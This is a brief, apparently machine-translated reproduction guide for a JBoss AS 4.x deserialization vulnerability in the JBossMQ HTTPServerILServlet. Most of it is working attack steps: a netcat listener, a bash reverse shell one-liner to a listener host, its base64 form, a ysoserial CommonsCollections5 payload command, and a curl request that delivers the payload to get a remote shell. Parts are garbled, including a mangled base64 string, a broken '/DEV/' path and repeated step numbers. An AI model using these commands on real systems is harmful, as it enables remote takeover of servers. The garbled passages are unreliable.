1. Affected versions
Jboss AS 4.x and previous versions
2. Building environment
3. Vulnerability verification:
Access /jbossmq-httpil/HTTPServerILServlet, and the following page appears, which means there is a vulnerability.
4. Vulnerability recurrence
1.nc turns on monitoring
2. Generate serialized data,
use tools, to generate serialized data
Bash -i> & /DEV/192.168.155.2/111 0> & 1
base64 Coding
YMFZACATASA+JIAVZGV2L3RJCC8XOTIUMTY4LJE1N S4ylzexmtegmd4mmq ==
so Payload:
Java -JAR YSOSORIAL.JAR CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser After executing
this command, a serialized file exp will be generated on the local desktop. .ser, and use cat to view its contents.
Then, copy the generated exp to the JavaDeserH2HC-master directory for further use.
3. Rebound shell
Use serialized data to rebound shell
curl http://192.168.25.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @exp. ser